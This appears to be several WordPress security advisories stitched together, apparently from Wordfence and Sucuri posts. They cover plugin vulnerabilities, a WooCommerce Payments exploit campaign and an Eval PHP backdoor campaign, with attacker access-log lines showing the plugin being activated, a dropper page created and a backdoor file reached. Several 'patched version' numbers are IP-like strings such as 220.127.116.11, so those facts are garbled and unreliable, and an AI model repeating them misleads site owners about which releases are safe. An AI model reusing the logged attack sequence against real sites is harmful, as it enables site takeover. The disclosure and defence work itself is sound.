“Never Assume Anything” – that is the 4th Guiding Principle written in the Security section of the WordPress Common APIs Handbook for developers. When it comes to WordPress plugin security, assumptions can be dangerous. This became evident when the Wordfence Threat Intelligence team discovered an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in 14 different email logging plugins. The common thread? An assumption that the contents of emails generated within a WordPress instance could not be influenced by external actors. This oversight potentially exposed over 600,000 users to significant security risks.
We contacted all affected vendors after initial discovery between June 4, 2023 and June 11, 2023. Some developers were responsive while others were not, however all plugins except for one received updates to address these vulnerabilities.
All Wordfence users are protected against any exploits targeting these vulnerabilities by the Wordfence firewall’s built-in Cross-Site Scripting protection.
Below is a table detailing the affected plugins, along with their respective slugs, CVEs, links, reported dates, disclosed dates, and fixed versions.
The Wordfence Threat Intelligence team has been monitoring an ongoing exploit campaign targeting a recently disclosed vulnerability in WooCommerce Payments, a plugin installed on over 600,000 sites. Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on Thursday, July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on Saturday, July 16, 2023.
All Wordfence users, including Wordfence free users, have been protected against this vulnerability since April 22, 2023 via a Firewall rule we developed to block exploit attempts. Wordfence Premium, Care, and Response sites received protection even earlier, on March 23, 2023. Versions 4.8.0 – 5.6.1 of the WooCommerce Payments plugin are vulnerable.
Readers can continue watching this and other trends on the Wordfence Intelligence dashboard, where it is currently the most heavily-attacked unique WordPress vulnerability.
Unlike many other large-scale campaigns which typically attack millions of sites indiscriminately, this one seems to be targeted against a smaller set of websites. What’s particularly interesting is that we began seeing early warning signs several days before the main wave of attacks – an increase in plugin enumeration requests searching for a readme.txt file in the wp-content/plugins/woocommerce-payments/ directory of millions of sites.
On June 19, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Arbitrary File Upload vulnerability in WPEverest’s User Registration plugin, which is actively installed on more than 60,000 WordPress websites. This vulnerability makes it possible for an authenticated attacker with minimal permissions, such as a subscriber, to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
All users of Wordfence received a firewall rule to protect against any exploits targeting this vulnerability by July 20, 2023.
We contacted WPEverest on June 19, 2023, and received a response the same day. After we provided full disclosure details, the developer released the first patch, which did not fully address the vulnerability, in version 3.0.2 on June 29, 2023. A fully patched version, 188.8.131.52, was released on July 4, 2023. We would like to commend the WPEverest development team for their prompt response and timely patch.
We urge users to update their sites with the latest patched version of User Registration, which is version 184.108.40.206 at the time of this writing, as soon as possible.
On June 5, 2023, the Wordfence Threat Intelligence team identified, and began the responsible disclosure process, for an Arbitrary User Password Change vulnerability in LearnDash LMS plugin, a WordPress plugin that is actively installed on more than 100,000 WordPress websites according to our estimates. This vulnerability makes it possible for any user with an existing account to reset arbitrary user passwords, including user accounts with administrative-level access.
Wordfence Premium users received a firewall rule to protect against any exploits targeting this vulnerability on June 5, 2023. Sites still using the free version of Wordfence received the same protection on July 5, 2023.
Wordfence contacted the LearnDash team on June 5, 2023, and received a response the same day. After providing full disclosure details, the developer released a patch on June 6, 2023. We would like to commend the LearnDash support and development team for their prompt response and timely patch, which was released in just one day.
We urge users to update their sites with the latest patched version of LearnDash LMS, version 220.127.116.11 at the time of this writing, as soon as possible considering this is a vulnerability with a critical impact.
On June 29, 2023, the Wordfence Threat Intelligence Team became aware of an unpatched privilege escalation vulnerability being actively exploited in Ultimate Member, a WordPress plugin installed on over 200,000 sites, through our vulnerability changelog monitoring we do to ensure the Wordfence Intelligence Vulnerability Database has the most up to date and accurate information. Upon further investigation, we discovered that this vulnerability is being actively exploited and it hasn’t been adequately patched in the latest version available, which is 2.6.6 at the time of this writing.
Once we determined the root cause, we released a firewall rule to help protect our WordfencePremium customers. Wordfence free users will receive the same protection in 30 days on July 29th, 2023. As the latest version of the plugin, 2.6.6, is not fully patched, we recommend uninstalling the plugin until a complete patch has been released.
On May 28, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in miniOrange’s WordPress Social Login and Register plugin, which is actively installed on more than 30,000 WordPress websites. The vulnerability makes it possible for an unauthenticated attacker to gain access to any account on a site including accounts used to administer the site, if the attacker knows, or can find, the associated email address.
Wordfence Premium users received a firewall rule to protect against any exploits targeting this vulnerability on June 2, 2023. Sites still using the free version of Wordfence received the same protection on July 2, 2023.
Wordfence contacted miniOrange on May 30, 2023, and received a response on June 2, 2023. After they provided full disclosure details, the developer released the first patch, which still contained a vulnerability, in version 7.6.4 on June 12, 2023. A fully patched version, 7.6.5, was released on June 14, 2023.
We urge users to ensure their sites have been updated with the latest patched version of WordPress Social Login and Register, which is version 7.6.5 at the time of this writing, as soon as possible.
On May 22, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in StylemixThemes’s BookIt plugin, which is actively installed on more than 10,000 WordPress websites. The vulnerability makes it possible for an attacker to gain access to any account on the site, including the administrator account, if the attacker knows their email address.
Sites still using the free version of Wordfence will receive a firewall rule to protect against any exploits targeting this vulnerability on June 21, 2023. WordFence Premium users have been protected since May 23.
WordFence contacted StylemixThemes on May 22, 2023, and received a response the next day. After providing full disclosure details, the developer released the first patch on May 31, 2023, which still contained a vulnerability and then released the fully patch on June 13, 2023. We would like to commend the StylemixThemes development team for their prompt response and timely patch.
We urge users to update their sites with the latest patched version of BookIt, version 2.3.8 at the time of this writing, as soon as possible.
On May 29, 2023, the WordFence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in Tyche Softwares’s Abandoned Cart Lite for WooCommerce plugin, which is actively installed on more than 30,000 WordPress websites. This vulnerability makes it possible for an attacker to gain access to the accounts of users who have abandoned their carts, who are typically customers but can extend to other high-level users when the right conditions are met.
Users of paid WordFence versions received a firewall rule to protect against any exploits targeting this vulnerability on June 7, 2023. Sites still using the free version of Wordfence will receive the same protection on July 7, 2023.
WordFence contacted Tyche Softwares on May 30, 2023, and received a response the next day. After providing full disclosure details, the developer released a patch on June 6, 2023. We would like to commend the Tyche Softwares development team for their prompt response and timely patch.
We urge users to update their sites with the latest patched version of Abandoned Cart Lite for WooCommerce, version 5.15.1 at the time of this writing, as soon as possible.
Attackers are always finding new and creative ways to compromise websites and maintain their foothold in environments. This is frequently done via the use of backdoors: PHP scripts designed to allow attackers access and control even after you’ve changed your passwords and thought that the worst was over.
Since external scans are unable to see website backdoors they can often be identified through the usage of server-side scans and file-integrity monitoring, which we offer as part of our services. This is also offered through a number of available WordPress security plugins that can be used on your website.
However, we recently started observing attackers making use of an unorthodox type of backdoor and reinfection method which would go completely undetected if website monitoring doesn’t happen to include the database.
Almost all of the time website backdoors are coded in the PHP programming language: the backbone of the modern web. WordPress itself (making up over 40%+ of the web) is largely PHP based, as well as most other major CMS platforms like Joomla, Magento and others. PHP is an incredibly versatile language, which also means that it can be misused by attackers. One of the most common (mis)usages by attackers are backdoors.
According to our recent 2022 Website Threat Report, we can see that remote code execution backdoors, webshells, and uploaders are the most popular among attackers to deploy to infected environments:
This code is quite simple: It uses the file_put_contents function to create a PHP script into the docroot of the website with the specified remote code execution backdoor. All the attacker needs to do is to visit one of the infected posts or pages and the backdoor will be injected into the file structure.
It’s not exactly a new backdoor, however; more conventional PHP backdoors of this variety were found as early as last summer and over 6,000 instances of this backdoor were cleaned from compromised sites in the last 6 months alone. However, the backdoor being injected into the database is certainly a new and interesting development.
Misuse of legitimate plugin
In the code sample above you may notice the [evalphp] WordPress shortcodes (small code tags used in WordPress environments that make it easy to add complex functionality to your website). These are related to a very old WordPress plugin available in the official repository with the same name Eval PHP:
This plugin allows PHP code to be inserted into pages and posts of WordPress sites and then executed every time the posts are opened in a browser. What could go wrong, right?
It hasn’t been updated in over a decade and has very few real active installations. However, we can see that since the beginning of April it has surged in popularity:
For the ten years leading up to the end of March, 2023, this plugin rarely had 1 download a day. But around March 29, 2023 we saw daily downloads spike to 7,000. After that, every single day we have seen 3k-5k downloads — with over 100,000 downloads total.
This WordPress data correlates to our own logs, where we see that starting March 29, 2023, some attackers started installing the EvalPHP plugin on compromised sites and using it to create the earlier mentioned backdoors.
In all cases the requests originate from these three IP addresses:
18.104.22.168 – AEZA-AS, RU
22.214.171.124 – AEZA-AS, RU
126.96.36.199 – AEZA-AS, RU
188.8.131.52 - - [08/Apr/2023:07:28:21 -0700] "PUT /wp-json/wp/v2/plugins/evalphp/evalphp/?status=active HTTP/1.1" 200 635 "http://<redacted>.com/wp-json/wp/v2/plugins" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 613
184.108.40.206 - - [08/Apr/2023:07:28:30 -0700] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 2029 "http://<redacted>.com/wp-json/wp/v2/plugins/evalphp/evalphp/?status=active" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 504
220.127.116.11 - - [08/Apr/2023:07:28:31 -0700] "GET /3e9c0ca6bbe9.php HTTP/1.1" 200 27 "http://<redacted>.com/wp-json/wp/v2/pages" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 17
Here you can see a sequence of requests that:
Checks to make sure that the Eval PHP plugin is active.
Creates a page with malware inside the [evalphp] shortcodes. It is enough to execute the PHP code and drop the 3e9c0ca6bbe9.php backdoor (the filename is unique for each environment) in the site root.
Accesses the newly dropped backdoor.
Since the backdoor uses the $_REQUEST[id] to obtain the executable PHP code, it doesn’t require a POST request to conceal its parameters in access logs — it can pass them as cookies, since $_REQUEST contains the contents of $_GET, $_POST and $_COOKIE.
GET requests without visible parameters look less suspicious than POST requests. But in the case of this backdoor, GET can be equally dangerous.
Pages with evalphp malware
In our experience, hackers sometimes create a test page (new pages are not displayed by default on the home page) slug publish, (the URL on a typical WordPress site will be <site-domain>.com/publish/) and the word “Test” as its only contents.
However, the real backdoors are created in multiple posts that are saved as drafts and not publicly visible at all. The way the Eval PHP plugin works it’s enough to save a page as a draft in order to execute the PHP code inside the [evalphp] shortcodes.
This is how these page drafts look in the SQL dump of the wp_posts table:
In all cases, attackers were able to successfully log into WordPress admin. And the malicious pages are created with a real site administrator as their author. However, on some of the compromised sites we found created malicious admin users with random names and outlook.com emails — for example: 5faf461e / 5faf461e@outlook[.]com, df8a6aa9 / df8a6aa9@outlook[.]com, etc.
The compromised sites sometimes have the same backdoor installed in other files. Most often we find it in /wp-content/plugins/background-image-cropper/accesson.php — in logs we find how hackers upload a custom version of the legitimate background-image-cropper plugin. We also find it in the theme’s functions.php file when attackers modify this file using the WordPress theme editor.
Why are attackers putting backdoors into wp_posts?
You might be wondering why the attackers would choose this new tactic of injecting backdoors into compromised website environments rather than just sticking with good old fashioned PHP backdoors.
Although the injection in question does drop a conventional backdoor into the file structure, the combination of a legitimate plugin and a backdoor dropper in a WordPress post allows them to easily reinfect the website and stay hidden — all they need to do is to visit a “benign” web page.
Fortunately, some WordPress security plugins such as our Sucuri Scannerdo log administrator activity within a website, such as plugin installations and changes to pages/posts which would be a symptom of this attack. If you notice the Eval PHP plugin installed on your website and it wasn’t you who did it then there’s a good chance that your website has been compromised.
Potentially dangerous plugins in WordPress repository
At this point, WordPress has a warning when you open the EvalPHP page in the official plugin repository:
This plugin hasn’t been tested with the latest 3 major releases of WordPress. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.
However, this may not be enough for plugins that can be easily abused. Maybe such plugins should be completely delisted, especially when they are not updated for 10+ years and have a really small legitimate user base.
This PHPEval plugin that hasn’t been updated for 11+ years and has 40+ active users. Is there a reason to keep it in the repository after so many years of inactivity? And by the way, we can see an increased interest in this plugin during the last week…
Keeping such plugins in the official repository makes it easier for hackers to stay under radar since they can install a legitimate unmodified plugin from a reputable source instead of installing fake plugins or modifying existing plugins, which can be detected by scanners that monitor integrity of known plugins.
Mitigation steps to protect your environment
In checking logs from environments affected by these backdoors, so far all of them seemed like the attackers already had established administrator access to the websites which allowed them to install the evalphp plugin within the environments.
This is a testament to how crucially important it is to secure the wp-admin panel of your WordPress environment as well as monitor any administrator activity taking place. In addition to regular file cleanup and changing passwords, don’t forget to review your WordPress users and pages — some of them may have been created by hackers.
Other steps to mitigate risk from infection include:
Keep your website patched and up to date with the latest security releases
On April 3, 2023, the WordFence team uncovered two significant vulnerabilities – an Arbitrary User Password Reset to Privilege Escalation, and an Insecure Direct Object Reference leading to Arbitrary Post Deletion. Both vulnerabilities were found to affect Directorist versions 7.5.4 and earlier.
Sites using the free version of Wordfence received a firewall rule to protect against any exploits targeting these vulnerabilities on May 4, 2023.
Unfortunately, on June 1, 2023, the plugin was closed due to developer unresponsiveness, and it currently remains unavailable for download from the repository. This presents an issue as site owners are unable to request an update directly via their WordPress dashboard. Given this situation, we advise site owners to either temporarily uninstall the plugin, or manually download the patched version, 7.5.5, directly from the developer’s site and upload it to their sites for optimal protection. For this reason, we have intentionally kept specific vulnerability details to a minimum in this post.